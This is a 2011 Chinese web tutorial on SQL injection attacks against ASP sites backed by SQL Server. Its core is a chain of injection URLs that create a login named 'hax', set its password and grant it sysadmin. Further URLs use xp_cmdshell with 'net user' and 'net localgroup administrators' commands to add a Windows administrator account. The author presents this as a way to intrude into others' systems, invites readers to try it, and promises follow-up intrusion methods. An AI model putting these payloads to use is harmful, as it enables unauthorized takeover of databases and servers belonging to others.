您现在的位置:主页 > 数据库 > MS_SQL >

SQLServer数据库的一些攻击

来源:建站吧 责任编辑:Jzq8 发表时间:2011-12-23 点击:
 对于国内外的很多新闻,BBS和电子商务网站都采用ASP+SQL设计,而写 ASP的程序员很多(有很多刚刚毕业的),所以,ASP+SQL的攻击成功率也比较高。这类攻击方法与NT的版本和SQL的版本没有多大的关系,也没有相应的补丁,因为漏洞是程序员自己造成的,而且大多数讲解ASP编 程的书上,源代码例子就有这个漏洞存在,其实只是一些合法的ASP对SQL的请求,就留下后患无穷!

  这种攻击方法最早源于'or'1'='1的漏洞(我们暂且称其为漏洞),这个漏洞的原理我想大家因该都知道了,那么随之而来的便是;exec sp_addlogin hax(在数据库内添加一个hax用户),但是这个方法的限制很大,首先ASP使用的SQL Server账号是个管理员,其次请求的提交变 量在整个SQL语句的最后,因为有一些程序员采用SELECT * FROM news WHERE id=... AND topic=... AND .....

  这种方法请求数据库,那么如果还用以上的例子就会

  news.asp?id=2;exec sp_addlogin hax

  变成SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=... AND ...   

  整个SQL语句在执行sp_addlogin的存储过程后有AND与判断存在,语法错误,你的sp_addlogin自然也不能正常运行了,因此试试看下面这个方法   

  news.asp?id=2;exec sp_addlogin hax;--

  后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!

  那么我们连一起来用吧

  news.asp?id=2;exec master.dbo.sp_addlogin hax;--

  news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--

  news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--

  news.asp?id=2;exec master.dbo.xp_cmdshell 'net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

  news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--  这样,你在他的数据库和系统内都留下了hax管理员账号了

  当然,前提条件是ASP用管理员账号,所以虚拟空间大家就别试了,不会存在这个漏洞的。

  以后我们会讨论,如果对方的ASP不是用SQL管理员账号,我们如何入侵,当然也会涉及到1433端口的入侵

  当然大家可以试试看在id=2后面加上一个'符号,主要看对方的ASP怎么写了
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
验证码:点击我更换图片

今日头条

更多>>

推荐图文

  • SQL Server 2005 安全设置教程
  • SQL Server2000连接中的常见错误
  • 剖析SQLServer查询通知之基础篇
  • SQLServer数据加密技术应用研究
  • SQL教程:SQLServer备份和灾难恢复
  • 使用publishing转移MSSQL数据
  • SQL集合函数中利用casewhenthen技巧
  • SQLServer数据挖掘中的几个问题之理解内容类型
  • 数据库置疑?几步搞定SQL数据库修复
Alexa - 客户服务 - 联系方法 - 招聘信息 - 友情链接 - 网站地图 - TAG标签 - RSS订阅
Copyright © 2010-2012 JZQ8.COM. 建站吧|建站去吧 版权所有
冀ICP备09002514号
冀ICP备09002514号 网络报警 企业法人营业执照 中国互联网协会 支付宝付款 网银在线付款